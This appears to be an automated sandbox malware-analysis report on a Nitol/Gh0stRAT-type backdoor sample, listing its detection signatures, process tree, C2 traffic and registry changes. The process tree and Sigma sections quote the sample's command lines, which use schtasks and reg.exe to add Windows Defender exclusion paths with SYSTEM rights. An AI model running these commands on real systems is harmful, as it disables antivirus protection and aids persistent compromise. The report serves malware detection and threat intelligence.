Edit tour

Windows Analysis Report
2749837485743-7684385786.05.exe

Overview

General Information

Sample name:	2749837485743-7684385786.05.exe
Analysis ID:	1584634
MD5:	5b695fabfcd1da54f7c193ef5f11ef6a
SHA1:	8097a65d6e89522851b53b831aaf45afb9f0267b
SHA256:	697d0f16d16ac7df2254469ab782d57a121c487ddaacca4a71f82bd976490ff2
Tags:	backdoorexemsisilverfoxwinosuser-zhuzhu0009
Infos:

Detection

Nitol

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for dropped file

Malicious sample detected (through community Yara rule)

Suricata IDS alerts for network traffic

Yara detected Nitol

AI detected suspicious sample

Adds extensions / path to Windows Defender exclusion list (Registry)

Creates an undocumented autostart registry key

Drops PE files to the document folder of the user

Found direct / indirect Syscall (likely to bypass EDR)

Machine Learning detection for dropped file

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

PE file contains section with special chars

Sample is not signed and drops a device driver

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Sigma detected: Invoke-Obfuscation VAR+ Launcher

Switches to a custom stack to bypass stack traces

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Uses cmd line tools excessively to alter registry or file data

Uses schtasks.exe or at.exe to add and modify task schedules

AV process strings found (often used to terminate AV products)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to delete services

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates COM task schedule object (often to register a task for autostart)

Creates a process in suspended mode (likely to inject code)

Creates driver files

Creates files inside the driver directory

Creates files inside the system directory

Creates or modifies windows services

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

Entry point lies outside standard sections

Found dropped PE file which has not been started or loaded

Found evasive API chain (may stop execution after checking a module file name)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Suspicious Windows Defender Folder Exclusion Added Via Reg.EXE

Sigma detected: Windows Defender Exclusions Added - Registry

Uses code obfuscation techniques (call, push, ret)

Uses reg.exe to modify the Windows registry

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Process Tree

System is w10x64

2749837485743-7684385786.05.exe (PID: 3916 cmdline: "C:\Users\user\Desktop\2749837485743-7684385786.05.exe" MD5: 5B695FABFCD1DA54F7C193EF5F11EF6A)

7tqorj.exe (PID: 2544 cmdline: C:\Users\user\Documents\7tqorj.exe MD5: D3709B25AFD8AC9B63CBD4E1E1D962B9)

7tqorj.exe (PID: 504 cmdline: C:\Users\user\Documents\7tqorj.exe MD5: D3709B25AFD8AC9B63CBD4E1E1D962B9)

7tqorj.exe (PID: 3476 cmdline: C:\Users\user\Documents\7tqorj.exe MD5: D3709B25AFD8AC9B63CBD4E1E1D962B9)

cmd.exe (PID: 5560 cmdline: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 364 cmdline: SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 4080 cmdline: SCHTASKS /Run /TN "Task1" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 3884 cmdline: SCHTASKS /Delete /TN "Task1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)

cmd.exe (PID: 6928 cmdline: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 3564 cmdline: SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 524 cmdline: SCHTASKS /Run /TN "Task1" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 948 cmdline: SCHTASKS /Delete /TN "Task1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)

cmd.exe (PID: 3620 cmdline: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 3792 cmdline: SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 5160 cmdline: SCHTASKS /Run /TN "Task1" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 6600 cmdline: SCHTASKS /Delete /TN "Task1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)

cmd.exe (PID: 6216 cmdline: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 6960 cmdline: SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 6644 cmdline: SCHTASKS /Run /TN "Task1" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 612 cmdline: SCHTASKS /Delete /TN "Task1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)

qNHTRl.exe (PID: 5052 cmdline: "C:\Program Files (x86)\qNHTRl\qNHTRl.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)

cmd.exe (PID: 1484 cmdline: cmd /c echo.>c:\xxxx.ini MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 3632 cmdline: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

reg.exe (PID: 5792 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)

cmd.exe (PID: 5756 cmdline: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

reg.exe (PID: 5504 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)

cmd.exe (PID: 6188 cmdline: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

reg.exe (PID: 7072 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)

cmd.exe (PID: 1456 cmdline: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 1268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

reg.exe (PID: 3540 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)

qNHTRl.exe (PID: 5032 cmdline: "C:\Program Files (x86)\qNHTRl\qNHTRl.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)

NroRNr.exe (PID: 4800 cmdline: "C:\Program Files (x86)\2U36F\NroRNr.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)

NroRNr.exe (PID: 7136 cmdline: "C:\Program Files (x86)\2U36F\NroRNr.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)

qNHTRl.exe (PID: 2104 cmdline: "C:\Program Files (x86)\qNHTRl\qNHTRl.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Nitol		No Attribution	https://asec.ahnlab.com/en/44504/ https://blogs.technet.microsoft.com/microsoft_blog/2012/09/13/microsoft-disrupts-the-emerging-nitol-botnet-being-spread-through-an-unsecure-supply-chain/ https://en.wikipedia.org/wiki/Nitol_botnet https://krebsonsecurity.com/tag/nitol/	https://malpedia.caad.fkie.fraunhofer.de/details/win.nitol

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000029.00000002.3983670816.0000000004240000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Nitol	Yara detected Nitol	Joe Security
00000029.00000002.3984518385.000000001002D000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Nitol	Yara detected Nitol	Joe Security
Process Memory Space: qNHTRl.exe PID: 5052	JoeSecurity_Nitol	Yara detected Nitol	Joe Security
Process Memory Space: qNHTRl.exe PID: 5052	PlugXStrings	PlugX Identifying Strings	Seth Hardy	0x30668:$Dwork: d:\work 0x6a4f2:$Dwork: d:\work 0xa64e4:$Dwork: d:\work 0xff401:$Shell6: Shell6 0x1001e0:$Shell6: Shell6

Unpacked PEs

Source	Rule	Description	Author	Strings
41.2.qNHTRl.exe.42403e8.5.raw.unpack	JoeSecurity_Nitol	Yara detected Nitol	Joe Security
41.2.qNHTRl.exe.10000000.8.unpack	JoeSecurity_Nitol	Yara detected Nitol	Joe Security
41.2.qNHTRl.exe.42403e8.5.unpack	JoeSecurity_Nitol	Yara detected Nitol	Joe Security
5.2.7tqorj.exe.2880000.1.unpack	INDICATOR_SUSPICIOUS_DisableWinDefender	Detects executables containing artifcats associated with disabling Widnows Defender	ditekSHen	0x1fb0f:$e1: Microsoft\Windows Defender\Exclusions\Paths 0x1fbc2:$e1: Microsoft\Windows Defender\Exclusions\Paths 0x1fcd2:$e1: Microsoft\Windows Defender\Exclusions\Paths 0x1fc20:$e2: Add-MpPreference -ExclusionPath
6.2.7tqorj.exe.2830000.1.unpack	INDICATOR_SUSPICIOUS_DisableWinDefender	Detects executables containing artifcats associated with disabling Widnows Defender	ditekSHen	0x1fb0f:$e1: Microsoft\Windows Defender\Exclusions\Paths 0x1fbc2:$e1: Microsoft\Windows Defender\Exclusions\Paths 0x1fcd2:$e1: Microsoft\Windows Defender\Exclusions\Paths 0x1fc20:$e2: Add-MpPreference -ExclusionPath
41.2.qNHTRl.exe.3100000.4.unpack	INDICATOR_SUSPICIOUS_DisableWinDefender	Detects executables containing artifcats associated with disabling Widnows Defender	ditekSHen	0x221dd:$e1: Microsoft\Windows Defender\Exclusions\Paths 0x2225b:$e2: Add-MpPreference -ExclusionPath
Click to see the 1 entries

Sigma Signatures

System Summary

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Source: Process started

Author: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F, CommandLine: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Users\user\Documents\7tqorj.exe, ParentImage: C:\Users\user\Documents\7tqorj.exe, ParentProcessId: 3476, ParentProcessName: 7tqorj.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F, ProcessId: 5560, ProcessName: cmd.exe

Sigma detected: Invoke-Obfuscation VAR+ Launcher

Source: Process started

Sigma detected: Suspicious Windows Defender Folder Exclusion Added Via Reg.EXE

Source: Process started

Author: frack113: Data: Command: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f, CommandLine: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f, CommandLine|base64offset|contains: , Image: C:\Windows\System32\reg.exe, NewProcessName: C:\Windows\System32\reg.exe, OriginalFileName: C:\Windows\System32\reg.exe, ParentCommandLine: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3632, ParentProcessName: cmd.exe, ProcessCommandLine: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f, ProcessId: 5792, ProcessName: reg.exe

Sigma detected: Windows Defender Exclusions Added - Registry

Source: Registry Key set

Author: Christian Burkard (Nextron Systems): Data: Details: 0, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\reg.exe, ProcessId: 5792, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData

Suricata Signatures

ETPRO MALWARE Backdoor/Win.Gh0stRAT CnC Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-06T04:51:51.032072+0100	2852901	1	Malware Command and Control Activity Detected	192.168.2.6	50000	8.217.59.73	8917	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for dropped file

Source: C:\Program Files (x86)\2U36F\tbcore3U.dll	Avira: detection malicious, Label: TR/Redcap.vdzex
Source: C:\Program Files (x86)\qNHTRl\tbcore3U.dll	Avira: detection malicious, Label: TR/Redcap.vdzex

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Program Files (x86)\2U36F\tbcore3U.dll	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\qNHTRl\tbcore3U.dll	Joe Sandbox ML: detected

Source: unknown	HTTPS traffic detected: 39.103.20.26:443 -> 192.168.2.6:49921 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 118.178.60.9:443 -> 192.168.2.6:49992 version: TLS 1.2

Source:	Binary string: d:\work\iGiveButton\toolbar4\Release_bin\uninstall.pdb source: 7tqorj.exe, 00000007.00000003.2996806877.0000000003DF5000.00000004.00000020.00020000.00000000.sdmp, qNHTRl.exe, 00000029.00000000.3231942330.0000000000818000.00000002.00000001.01000000.0000000A.sdmp, qNHTRl.exe, 00000029.00000002.3974096854.0000000000818000.00000002.00000001.01000000.0000000A.sdmp, qNHTRl.exe, 00000029.00000002.3974221880.00000000008BE000.00000004.00000020.00020000.00000000.sdmp, qNHTRl.exe, 0000002A.00000002.3271497279.0000000000818000.00000002.00000001.01000000.0000000A.sdmp, qNHTRl.exe, 0000002A.00000000.3255146403.0000000000818000.00000002.00000001.01000000.0000000A.sdmp, NroRNr.exe, 0000002B.00000002.3272775080.0000000000FA8000.00000002.00000001.01000000.0000000C.sdmp, NroRNr.exe, 0000002B.00000000.3258989374.0000000000FA8000.00000002.00000001.01000000.0000000C.sdmp, NroRNr.exe, 0000002E.00000000.3388721194.0000000000FA8000.00000002.00000001.01000000.0000000C.sdmp, NroRNr.exe, 0000002E.00000002.3399267881.0000000000FA8000.00000002.00000001.01000000.0000000C.sdmp, qNHTRl.exe, 0000002F.00000000.3395908790.0000000000818000.00000002.00000001.01000000.0000000A.sdmp, qNHTRl.exe, 0000002F.00000002.3402992961.0000000000818000.00000002.00000001.01000000.0000000A.sdmp
Source:	Binary string: c:\tools_git_priv\truesight\driver\objfre_win7_amd64\amd64\TrueSight.pdb source: 189atohci.sys.0.dr
Source:	Binary string: R:\Everest\Tree\bin\WatersPrintCaptureProxy.pdb source: 2749837485743-7684385786.05.exe
Source:	Binary string: y:\avsdk5\user\make\build\public\64-bit\vseamps.pdb source: 2749837485743-7684385786.05.exe, 00000000.00000003.2625781442.0000000004992000.00000004.00000020.00020000.00000000.sdmp, 7tqorj.exe, 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmp, 7tqorj.exe, 00000005.00000000.2712564497.0000000140014000.00000002.00000001.01000000.00000008.sdmp, 7tqorj.exe, 00000006.00000000.2722446315.0000000140014000.00000002.00000001.01000000.00000008.sdmp, 7tqorj.exe, 00000006.00000002.2727976370.0000000140014000.00000002.00000001.01000000.00000008.sdmp, 7tqorj.exe, 00000007.00000000.2792322207.0000000140014000.00000002.00000001.01000000.00000008.sdmp, 7tqorj.exe.0.dr

Change of critical system settings

Adds extensions / path to Windows Defender exclusion list (Registry)

Source: C:\Windows\System32\reg.exe	Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\ProgramData	Jump to behavior
Source: C:\Windows\System32\reg.exe	Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Users	Jump to behavior
Source: C:\Windows\System32\reg.exe	Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Program Files (x86)	Jump to behavior
Source: C:\Windows\System32\reg.exe	Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Users\user\Documents	Jump to behavior

Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32	Jump to behavior
Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer	Jump to behavior
Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation	Jump to behavior
Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior

Source: C:\Users\user\Documents\7tqorj.exe

Code function: 5_2_00007FFDA580A1B8 FindFirstFileExW,

5_2_00007FFDA580A1B8

Source: C:\Users\user\Documents\7tqorj.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Users\user\Documents\7tqorj.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior

Source: C:\Users\user\Documents\7tqorj.exe	Code function: 4x nop then mov rax, qword ptr [rsp+78h]	5_2_000000014000DFFE
Source: C:\Users\user\Documents\7tqorj.exe	Code function: 4x nop then mov rax, qword ptr [rsp+78h]	5_2_000000014000DDFF
Source: C:\Users\user\Documents\7tqorj.exe	Code function: 4x nop then movsxd rbx, qword ptr [r14+10h]	5_2_0000000140011270
Source: C:\Users\user\Documents\7tqorj.exe	Code function: 4x nop then mov rax, qword ptr [rsp+78h]	5_2_000000014000DE96
Source: C:\Users\user\Documents\7tqorj.exe	Code function: 4x nop then mov rax, qword ptr [rsp+78h]	5_2_000000014000DEFB
Source: C:\Users\user\Documents\7tqorj.exe	Code function: 4x nop then mov rax, qword ptr [rsp+78h]	5_2_000000014000E178
Source: C:\Users\user\Documents\7tqorj.exe	Code function: 4x nop then mov rax, qword ptr [rsp+78h]	5_2_000000014000DDD9

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2852901 - Severity 1 - ETPRO MALWARE Backdoor/Win.Gh0stRAT CnC Checkin : 192.168.2.6:50000 -> 8.217.59.73:8917

Source: global traffic

TCP traffic: 192.168.2.6:50000 -> 8.217.59.73:8917

Source: Joe Sandbox View

ASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	TCP traffic detected without corresponding DNS query: 8.217.59.73
Source: unknown	TCP traffic detected without corresponding DNS query: 8.217.59.73
Source: unknown	TCP traffic detected without corresponding DNS query: 8.217.59.73
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
